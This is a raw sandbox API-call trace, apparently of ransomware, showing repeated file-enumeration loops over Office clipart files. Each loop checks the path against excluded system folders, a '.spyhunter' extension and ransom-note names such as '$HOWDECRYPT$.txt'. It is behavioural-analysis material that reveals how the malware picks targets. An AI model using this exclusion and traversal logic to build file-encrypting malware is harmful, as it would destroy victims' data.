0x2c0000 [0098.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fab0 [0098.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26b0) returned 0x2c16890 [0098.290] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.290] lstrcmpiW (lpString1="J0107490.WMF", lpString2="Windows") returned -1 [0098.290] lstrlenW (lpString="Windows") returned 7 [0098.290] lstrcmpiW (lpString1="J0107490.WMF", lpString2="$Recycle.bin") returned 1 [0098.290] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.290] lstrcmpiW (lpString1="J0107490.WMF", lpString2="System Volume Information") returned -1 [0098.290] lstrlenW (lpString="System Volume Information") returned 25 [0098.290] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 67 [0098.290] StrStrIW (lpFirst="J0107490.WMF", lpSrch=".spyhunter") returned 0x0 [0098.290] lstrcmpW (lpString1="J0107490.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.290] lstrcmpW (lpString1="J0107490.WMF", lpString2="_uninstalling_.png") returned 1 [0098.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF") returned 67 [0098.291] GetProcessHeap () returned 0x2c0000 [0098.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fb80 [0098.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26b8) returned 0x2c16890 [0098.291] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.291] lstrcmpiW (lpString1="J0107492.WMF", lpString2="Windows") returned -1 [0098.291] lstrlenW (lpString="Windows") returned 7 [0098.291] lstrcmpiW (lpString1="J0107492.WMF", lpString2="$Recycle.bin") returned 1 [0098.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.291] lstrcmpiW (lpString1="J0107492.WMF", lpString2="System Volume Information") returned -1 [0098.291] lstrlenW (lpString="System Volume Information") returned 25 [0098.291] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 67 [0098.291] StrStrIW (lpFirst="J0107492.WMF", lpSrch=".spyhunter") returned 0x0 [0098.291] lstrcmpW (lpString1="J0107492.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.291] lstrcmpW (lpString1="J0107492.WMF", lpString2="_uninstalling_.png") returned 1 [0098.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 67 [0098.303] GetProcessHeap () returned 0x2c0000 [0098.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f910 [0098.303] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26a8) returned 0x2c16890 [0098.303] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.303] lstrcmpiW (lpString1="J0107494.WMF", lpString2="Windows") returned -1 [0098.303] lstrlenW (lpString="Windows") returned 7 [0098.303] lstrcmpiW (lpString1="J0107494.WMF", lpString2="$Recycle.bin") returned 1 [0098.303] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.303] lstrcmpiW (lpString1="J0107494.WMF", lpString2="System Volume Information") returned -1 [0098.303] lstrlenW (lpString="System Volume Information") returned 25 [0098.303] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 67 [0098.303] StrStrIW (lpFirst="J0107494.WMF", lpSrch=".spyhunter") returned 0x0 [0098.303] lstrcmpW (lpString1="J0107494.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.303] lstrcmpW (lpString1="J0107494.WMF", lpString2="_uninstalling_.png") returned 1 [0098.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 67 [0098.303] GetProcessHeap () returned 0x2c0000 [0098.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f500 [0098.303] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26b0) returned 0x2c16890 [0098.304] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.304] lstrcmpiW (lpString1="J0107496.WMF", lpString2="Windows") returned -1 [0098.304] lstrlenW (lpString="Windows") returned 7 [0098.304] lstrcmpiW (lpString1="J0107496.WMF", lpString2="$Recycle.bin") returned 1 [0098.304] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.304] lstrcmpiW (lpString1="J0107496.WMF", lpString2="System Volume Information") returned -1 [0098.304] lstrlenW (lpString="System Volume Information") returned 25 [0098.304] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 67 [0098.304] StrStrIW (lpFirst="J0107496.WMF", lpSrch=".spyhunter") returned 0x0 [0098.304] lstrcmpW (lpString1="J0107496.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.304] lstrcmpW (lpString1="J0107496.WMF", lpString2="_uninstalling_.png") returned 1 [0098.304] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 67 [0098.304] GetProcessHeap () returned 0x2c0000 [0098.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fc50 [0098.304] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26b8) returned 0x2c16890 [0098.304] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.304] lstrcmpiW (lpString1="J0107500.WMF", lpString2="Windows") returned -1 [0098.304] lstrlenW (lpString="Windows") returned 7 [0098.304] lstrcmpiW (lpString1="J0107500.WMF", lpString2="$Recycle.bin") returned 1 [0098.304] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.304] lstrcmpiW (lpString1="J0107500.WMF", lpString2="System Volume Information") returned -1 [0098.304] lstrlenW (lpString="System Volume Information") returned 25 [0098.304] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 67 [0098.304] StrStrIW (lpFirst="J0107500.WMF", lpSrch=".spyhunter") returned 0x0 [0098.305] lstrcmpW (lpString1="J0107500.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.305] lstrcmpW (lpString1="J0107500.WMF", lpString2="_uninstalling_.png") returned 1 [0098.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 67 [0098.305] GetProcessHeap () returned 0x2c0000 [0098.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fd20 [0098.305] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26c0) returned 0x2c16890 [0098.305] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.305] lstrcmpiW (lpString1="J0107502.WMF", lpString2="Windows") returned -1 [0098.305] lstrlenW (lpString="Windows") returned 7 [0098.305] lstrcmpiW (lpString1="J0107502.WMF", lpString2="$Recycle.bin") returned 1 [0098.305] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.305] lstrcmpiW (lpString1="J0107502.WMF", lpString2="System Volume Information") returned -1 [0098.305] lstrlenW (lpString="System Volume Information") returned 25 [0098.305] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 67 [0098.305] StrStrIW (lpFirst="J0107502.WMF", lpSrch=".spyhunter") returned 0x0 [0098.305] lstrcmpW (lpString1="J0107502.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.305] lstrcmpW (lpString1="J0107502.WMF", lpString2="_uninstalling_.png") returned 1 [0098.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 67 [0098.305] GetProcessHeap () returned 0x2c0000 [0098.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fdf0 [0098.305] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26c8) returned 0x2c16890 [0098.305] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.305] lstrcmpiW (lpString1="J0107512.WMF", lpString2="Windows") returned -1 [0098.305] lstrlenW (lpString="Windows") returned 7 [0098.305] lstrcmpiW (lpString1="J0107512.WMF", lpString2="$Recycle.bin") returned 1 [0098.306] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.306] lstrcmpiW (lpString1="J0107512.WMF", lpString2="System Volume Information") returned -1 [0098.306] lstrlenW (lpString="System Volume Information") returned 25 [0098.306] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 67 [0098.306] StrStrIW (lpFirst="J0107512.WMF", lpSrch=".spyhunter") returned 0x0 [0098.306] lstrcmpW (lpString1="J0107512.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.306] lstrcmpW (lpString1="J0107512.WMF", lpString2="_uninstalling_.png") returned 1 [0098.306] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 67 [0098.306] GetProcessHeap () returned 0x2c0000 [0098.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fec0 [0098.306] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26d0) returned 0x2c16890 [0098.306] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.306] lstrcmpiW (lpString1="J0107514.WMF", lpString2="Windows") returned -1 [0098.306] lstrlenW (lpString="Windows") returned 7 [0098.306] lstrcmpiW (lpString1="J0107514.WMF", lpString2="$Recycle.bin") returned 1 [0098.306] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.306] lstrcmpiW (lpString1="J0107514.WMF", lpString2="System Volume Information") returned -1 [0098.306] lstrlenW (lpString="System Volume Information") returned 25 [0098.306] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 67 [0098.306] StrStrIW (lpFirst="J0107514.WMF", lpSrch=".spyhunter") returned 0x0 [0098.306] lstrcmpW (lpString1="J0107514.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.306] lstrcmpW (lpString1="J0107514.WMF", lpString2="_uninstalling_.png") returned 1 [0098.306] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 67 [0098.306] GetProcessHeap () returned 0x2c0000 [0098.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ff90 [0098.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26d8) returned 0x2c16890 [0098.307] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.307] lstrcmpiW (lpString1="J0107516.WMF", lpString2="Windows") returned -1 [0098.307] lstrlenW (lpString="Windows") returned 7 [0098.307] lstrcmpiW (lpString1="J0107516.WMF", lpString2="$Recycle.bin") returned 1 [0098.307] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.307] lstrcmpiW (lpString1="J0107516.WMF", lpString2="System Volume Information") returned -1 [0098.307] lstrlenW (lpString="System Volume Information") returned 25 [0098.307] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 67 [0098.307] StrStrIW (lpFirst="J0107516.WMF", lpSrch=".spyhunter") returned 0x0 [0098.307] lstrcmpW (lpString1="J0107516.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.307] lstrcmpW (lpString1="J0107516.WMF", lpString2="_uninstalling_.png") returned 1 [0098.307] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned 67 [0098.307] GetProcessHeap () returned 0x2c0000 [0098.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c20060 [0098.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26e0) returned 0x2c16890 [0098.307] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.307] lstrcmpiW (lpString1="J0107526.WMF", lpString2="Windows") returned -1 [0098.307] lstrlenW (lpString="Windows") returned 7 [0098.307] lstrcmpiW (lpString1="J0107526.WMF", lpString2="$Recycle.bin") returned 1 [0098.307] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.307] lstrcmpiW (lpString1="J0107526.WMF", lpString2="System Volume Information") returned -1 [0098.307] lstrlenW (lpString="System Volume Information") returned 25 [0098.307] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 67 [0098.307] StrStrIW (lpFirst="J0107526.WMF", lpSrch=".spyhunter") returned 0x0 [0098.307] lstrcmpW (lpString1="J0107526.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.308] lstrcmpW (lpString1="J0107526.WMF", lpString2="_uninstalling_.png") returned 1 [0098.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 67 [0098.308] GetProcessHeap () returned 0x2c0000 [0098.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c5b8 [0098.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26e8) returned 0x2c16890 [0098.308] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.308] lstrcmpiW (lpString1="J0107528.WMF", lpString2="Windows") returned -1 [0098.308] lstrlenW (lpString="Windows") returned 7 [0098.308] lstrcmpiW (lpString1="J0107528.WMF", lpString2="$Recycle.bin") returned 1 [0098.308] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.308] lstrcmpiW (lpString1="J0107528.WMF", lpString2="System Volume Information") returned -1 [0098.308] lstrlenW (lpString="System Volume Information") returned 25 [0098.308] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 67 [0098.308] StrStrIW (lpFirst="J0107528.WMF", lpSrch=".spyhunter") returned 0x0 [0098.308] lstrcmpW (lpString1="J0107528.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.308] lstrcmpW (lpString1="J0107528.WMF", lpString2="_uninstalling_.png") returned 1 [0098.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 67 [0098.308] GetProcessHeap () returned 0x2c0000 [0098.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38eff0 [0098.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26f0) returned 0x2c16890 [0098.308] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.308] lstrcmpiW (lpString1="J0107544.WMF", lpString2="Windows") returned -1 [0098.308] lstrlenW (lpString="Windows") returned 7 [0098.309] lstrcmpiW (lpString1="J0107544.WMF", lpString2="$Recycle.bin") returned 1 [0098.309] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.309] lstrcmpiW (lpString1="J0107544.WMF", lpString2="System Volume Information") returned -1 [0098.309] lstrlenW (lpString="System Volume Information") returned 25 [0098.309] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 67 [0098.309] StrStrIW (lpFirst="J0107544.WMF", lpSrch=".spyhunter") returned 0x0 [0098.309] lstrcmpW (lpString1="J0107544.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.309] lstrcmpW (lpString1="J0107544.WMF", lpString2="_uninstalling_.png") returned 1 [0098.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 67 [0098.309] GetProcessHeap () returned 0x2c0000 [0098.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27a58 [0098.309] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x26f8) returned 0x2c16890 [0098.309] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.309] lstrcmpiW (lpString1="J0107658.WMF", lpString2="Windows") returned -1 [0098.309] lstrlenW (lpString="Windows") returned 7 [0098.309] lstrcmpiW (lpString1="J0107658.WMF", lpString2="$Recycle.bin") returned 1 [0098.309] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.309] lstrcmpiW (lpString1="J0107658.WMF", lpString2="System Volume Information") returned -1 [0098.309] lstrlenW (lpString="System Volume Information") returned 25 [0098.309] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 67 [0098.309] StrStrIW (lpFirst="J0107658.WMF", lpSrch=".spyhunter") returned 0x0 [0098.309] lstrcmpW (lpString1="J0107658.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.309] lstrcmpW (lpString1="J0107658.WMF", lpString2="_uninstalling_.png") returned 1 [0098.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF") returned 67 [0098.310] GetProcessHeap () returned 0x2c0000 [0098.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27b28 [0098.310] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2700) returned 0x2c16890 [0098.310] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.310] lstrcmpiW (lpString1="J0107708.WMF", lpString2="Windows") returned -1 [0098.310] lstrlenW (lpString="Windows") returned 7 [0098.310] lstrcmpiW (lpString1="J0107708.WMF", lpString2="$Recycle.bin") returned 1 [0098.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.310] lstrcmpiW (lpString1="J0107708.WMF", lpString2="System Volume Information") returned -1 [0098.310] lstrlenW (lpString="System Volume Information") returned 25 [0098.310] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 67 [0098.310] StrStrIW (lpFirst="J0107708.WMF", lpSrch=".spyhunter") returned 0x0 [0098.310] lstrcmpW (lpString1="J0107708.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.310] lstrcmpW (lpString1="J0107708.WMF", lpString2="_uninstalling_.png") returned 1 [0098.310] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 67 [0098.310] GetProcessHeap () returned 0x2c0000 [0098.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27bf8 [0098.310] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2708) returned 0x2c16890 [0098.310] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.310] lstrcmpiW (lpString1="J0107712.WMF", lpString2="Windows") returned -1 [0098.310] lstrlenW (lpString="Windows") returned 7 [0098.310] lstrcmpiW (lpString1="J0107712.WMF", lpString2="$Recycle.bin") returned 1 [0098.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.310] lstrcmpiW (lpString1="J0107712.WMF", lpString2="System Volume Information") returned -1 [0098.310] lstrlenW (lpString="System Volume Information") returned 25 [0098.311] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 67 [0098.311] StrStrIW (lpFirst="J0107712.WMF", lpSrch=".spyhunter") returned 0x0 [0098.311] lstrcmpW (lpString1="J0107712.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.311] lstrcmpW (lpString1="J0107712.WMF", lpString2="_uninstalling_.png") returned 1 [0098.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 67 [0098.311] GetProcessHeap () returned 0x2c0000 [0098.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27cc8 [0098.311] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2710) returned 0x2c16890 [0098.311] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.311] lstrcmpiW (lpString1="J0107718.WMF", lpString2="Windows") returned -1 [0098.311] lstrlenW (lpString="Windows") returned 7 [0098.311] lstrcmpiW (lpString1="J0107718.WMF", lpString2="$Recycle.bin") returned 1 [0098.311] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.311] lstrcmpiW (lpString1="J0107718.WMF", lpString2="System Volume Information") returned -1 [0098.311] lstrlenW (lpString="System Volume Information") returned 25 [0098.311] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 67 [0098.311] StrStrIW (lpFirst="J0107718.WMF", lpSrch=".spyhunter") returned 0x0 [0098.311] lstrcmpW (lpString1="J0107718.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.311] lstrcmpW (lpString1="J0107718.WMF", lpString2="_uninstalling_.png") returned 1 [0098.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 67 [0098.311] GetProcessHeap () returned 0x2c0000 [0098.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27d98 [0098.311] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2718) returned 0x2c16890 [0098.312] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.314] lstrcmpiW (lpString1="J0107722.WMF", lpString2="Windows") returned -1 [0098.314] lstrlenW (lpString="Windows") returned 7 [0098.314] lstrcmpiW (lpString1="J0107722.WMF", lpString2="$Recycle.bin") returned 1 [0098.314] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.315] lstrcmpiW (lpString1="J0107722.WMF", lpString2="System Volume Information") returned -1 [0098.315] lstrlenW (lpString="System Volume Information") returned 25 [0098.315] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 67 [0098.315] StrStrIW (lpFirst="J0107722.WMF", lpSrch=".spyhunter") returned 0x0 [0098.315] lstrcmpW (lpString1="J0107722.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.315] lstrcmpW (lpString1="J0107722.WMF", lpString2="_uninstalling_.png") returned 1 [0098.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 67 [0098.315] GetProcessHeap () returned 0x2c0000 [0098.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27e68 [0098.315] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2720) returned 0x2c16890 [0098.315] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.315] lstrcmpiW (lpString1="J0107724.WMF", lpString2="Windows") returned -1 [0098.315] lstrlenW (lpString="Windows") returned 7 [0098.315] lstrcmpiW (lpString1="J0107724.WMF", lpString2="$Recycle.bin") returned 1 [0098.315] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.315] lstrcmpiW (lpString1="J0107724.WMF", lpString2="System Volume Information") returned -1 [0098.315] lstrlenW (lpString="System Volume Information") returned 25 [0098.315] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 67 [0098.315] StrStrIW (lpFirst="J0107724.WMF", lpSrch=".spyhunter") returned 0x0 [0098.315] lstrcmpW (lpString1="J0107724.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.315] lstrcmpW (lpString1="J0107724.WMF", lpString2="_uninstalling_.png") returned 1 [0098.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 67 [0098.315] GetProcessHeap () returned 0x2c0000 [0098.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c27f38 [0098.316] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2728) returned 0x2c16890 [0098.316] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.316] lstrcmpiW (lpString1="J0107728.WMF", lpString2="Windows") returned -1 [0098.316] lstrlenW (lpString="Windows") returned 7 [0098.316] lstrcmpiW (lpString1="J0107728.WMF", lpString2="$Recycle.bin") returned 1 [0098.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.316] lstrcmpiW (lpString1="J0107728.WMF", lpString2="System Volume Information") returned -1 [0098.316] lstrlenW (lpString="System Volume Information") returned 25 [0098.316] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 67 [0098.316] StrStrIW (lpFirst="J0107728.WMF", lpSrch=".spyhunter") returned 0x0 [0098.316] lstrcmpW (lpString1="J0107728.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.316] lstrcmpW (lpString1="J0107728.WMF", lpString2="_uninstalling_.png") returned 1 [0098.316] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 67 [0098.316] GetProcessHeap () returned 0x2c0000 [0098.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28008 [0098.316] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2730) returned 0x2c16890 [0098.316] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.316] lstrcmpiW (lpString1="J0107730.WMF", lpString2="Windows") returned -1 [0098.316] lstrlenW (lpString="Windows") returned 7 [0098.316] lstrcmpiW (lpString1="J0107730.WMF", lpString2="$Recycle.bin") 